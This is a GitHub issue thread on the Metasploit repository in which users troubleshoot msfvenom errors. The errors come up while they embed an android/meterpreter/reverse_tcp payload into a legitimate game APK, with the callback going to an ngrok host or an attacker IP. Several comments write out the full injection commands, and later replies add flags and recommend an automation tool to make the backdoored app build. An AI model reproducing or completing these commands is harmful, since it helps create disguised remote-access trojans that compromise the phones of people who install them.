### ISSUE TITLE
msfvenom Error: Malformed version number string 2.4.1-dirty

### ISSUE THREAD

**Issue by tejeshbathina** [rapid7/metasploit-framework#13520] opened 2020-05-26 11:22 UTC
hello, 
      when i am trying to create a payloaded apk with existing apk with the help of ngrok, i got this kind of error and i searched for this in many websites please help me....here is the code
**`msfvenom -x flappybird.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19172 -o ~Desktop/FlappyBird.apk`**
Using APK template: flappybird.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.4.1-dirty
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

please help me out of this

**Comment by gwillcox-r7** [comment] 2020-06-04 00:01
@tejeshbathina I believe this issue has already been reported previously. Try the solutions mentioned at https://github.com/rapid7/metasploit-framework/issues/13231. In particular you may need to run the command with `sudo` like so:

`sudo msfvenom -x flappybird.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19172 -o ~Desktop/FlappyBird.apk`.

Closing as this is a duplicate of https://github.com/rapid7/metasploit-framework/issues/13231 which has a known solution. If you are still encountering errors, feel free to reopen this issue.

**Closed by gwillcox-r7** 2020-06-04 00:01 UTC

**Comment by Abhaysoft-inc** [comment] 2020-10-03 07:44
Not Working There's a another Error also of Apktool

**Comment by gwillcox-r7** [comment] 2020-10-03 18:40
@Abhaysoft-inc Without an error message its going to be very hard to determine what the issue is. Additionally if the error is within APKTool itself and not within Metasploit, we would not be able to fix it ourselves. If you feel the issue is within Metasploit, please create a new issue using https://github.com/rapid7/metasploit-framework/issues/new/choose and select Bug Report, then fill out the template.

**Comment by Arceus1031** [comment] 2020-11-21 14:24
> Not Working There's a another Error also of Apktool

just type 'apt install apktool'

**Comment by hash30** [comment] 2021-02-12 18:04
Any solution of this error?

> sudo msfvenom -x /root/Desktop/AllTools/hackingapks/hacked.apk -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -o /root/Desktop/AllTools/hackingapks/hacked1.apk
Using APK template: /root/Desktop/AllTools/hackingapks/hacked.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /tmp/d20210212-15241-1qeknuu/original/AndroidManifest.xml

**Comment by gwillcox-r7** [comment] 2021-02-12 18:11
@hash30 Try installing APKTool 2.5.0 or later. I have been testing a lot of these issues and noticed that a lot of the issues were resolved when upgrading to APKTool 2.5.0. If this issue persists let me know.

**Comment by hash30** [comment] 2021-02-12 18:12
@gwillcox-r7 [https://github.com/rapid7/metasploit-framework/issues/13520#issuecomment-778351880](url) should i open a new issue for this problem?

**Comment by hash30** [comment] 2021-02-12 18:12
> @hash30 Try installing APKTool 2.5.0 or later. I have been testing a lot of these issues and noticed that a lot of the issues were resolved when upgrading to APKTool 2.5.0. If this issue persists let me know.

Ok sir

**Comment by hash30** [comment] 2021-02-12 18:46
> @hash30 Try installing APKTool 2.5.0 or later. I have been testing a lot of these issues and noticed that a lot of the issues were resolved when upgrading to APKTool 2.5.0. If this issue persists let me know.

I tried installing version 2.5.0 as per instructions on official site but got no luck! Any help here? It's still showing version 2.4.1-dirty :(

![apktool](https://user-images.githubusercontent.com/54507991/107809170-ab349400-6d90-11eb-945c-473ca884a2e2.png)

**Comment by gwillcox-r7** [comment] 2021-02-12 20:15
@hash30 You may need to `apt-get uninstall apktool` to remove the older version. Its likely that somewhere on your system its defaulting to using the older version.

**Comment by hash30** [comment] 2021-02-13 03:07
> @hash30 You may need to `apt-get uninstall apktool` to remove the older version. Its likely that somewhere on your system its defaulting to using the older version.

Yeah, it worked, Thanks man... I've used 

> apt autoremove apktool -y
to uninstall apktool instead of 

> apt-get uninstall apktool
Which removed it from my pc. See in picture below

![apktool](https://user-images.githubusercontent.com/54507991/107840047-87477180-6dd5-11eb-9855-53bba4bf374e.png)

After that i used apktool command in terminal to check the version of apktool which showed the updated version of apktool... See picture below

![apktool2](https://user-images.githubusercontent.com/54507991/107840098-f624ca80-6dd5-11eb-935e-b6363256728b.png)

Note: I've had already installed the latest version of apktool as described in this [guide](https://ibotpeaches.github.io/Apktool/install/) before uninstalling the previous version, I'm using kali linux 2020.2 for your info. I described these things to help you understand the process if you're facing the same problem like i've and came here for finding a solution.

**Comment by hash30** [comment] 2021-02-13 07:47
Any solution to this [new_issue](https://github.com/iBotPeaches/Apktool/issues/2508#issuecomment-778578091)?
I know it's not appropriate to ask this question here... But who knows if someone here will have any solution!

**Comment by hash30** [comment] 2021-02-13 13:18
How to request msfvenom to use the parameter "--use-aapt2" as an optional basis?

**Comment by hash30** [comment] 2021-02-21 16:11
> Any solution to this [new_issue](https://github.com/iBotPeaches/Apktool/issues/2508#issuecomment-778578091)?
> I know it's not appropriate to ask this question here... But who knows if someone here will have any solution!

If you're still facing issues like this... Then you can check [this solution](https://github.com/iBotPeaches/Apktool/issues/2508#issuecomment-782876370). :)

**Comment by Kushagra3911** [comment] 2022-02-13 12:24
It's a apk signing error,just use evil droid,it will automate the task,it worked for me

**Comment by JayanshJ** [comment] 2022-04-07 15:01
> Any solution of this error?
> 
> > sudo msfvenom -x /root/Desktop/AllTools/hackingapks/hacked.apk -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -o /root/Desktop/AllTools/hackingapks/hacked1.apk
> > Using APK template: /root/Desktop/AllTools/hackingapks/hacked.apk
> > [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> > [-] No arch selected, selecting arch: dalvik from the payload
> > [_] Creating signing key and keystore..
> > [_] Decompiling original APK..
> > [*] Decompiling payload APK..
> > Error: No such file or directory @ rb_sysopen - /tmp/d20210212-15241-1qeknuu/original/AndroidManifest.xml

add  --arch dalvik --platform Android  -e generic/none
